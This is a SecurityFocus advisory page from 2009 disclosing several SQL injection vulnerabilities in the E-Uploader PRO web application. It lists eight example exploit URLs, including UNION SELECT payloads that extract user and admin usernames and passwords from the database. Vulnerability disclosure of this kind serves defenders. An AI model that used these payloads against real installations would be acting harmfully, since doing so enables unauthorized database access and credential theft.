Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

E-Uploader PRO 'id' Parameter Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following examples are available:

http://www.example.com/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,user,pass),3,4,5,6,7+from+users/*
http://www.example.com/[installdir]/browser.php?view='+union+select+1,concat_ws(0x3a,admin_user,admin_pass),3,4,5,6,7+from+settings/*
http://www.example.com/[installdir]/img.php?id='+union+select+1,2,user()/*
http://www.example.com/[installdir]/file.php?id='+union+select+1,2,3/*
http://www.example.com/[installdir]/mail.php?id='+union+select+1,2,3/*
http://www.example.com/[installdir]/thumb.php?id='+union+select+1,2,user()/*
http://www.example.com/[installdir]/zip.php?id='+union+select+1,2,3/*
http://www.example.com/[installdir]/zipit.php?id='+union+select+1,2,3,4,5,6,7/*







 

Privacy Statement
Copyright 2009, SecurityFocus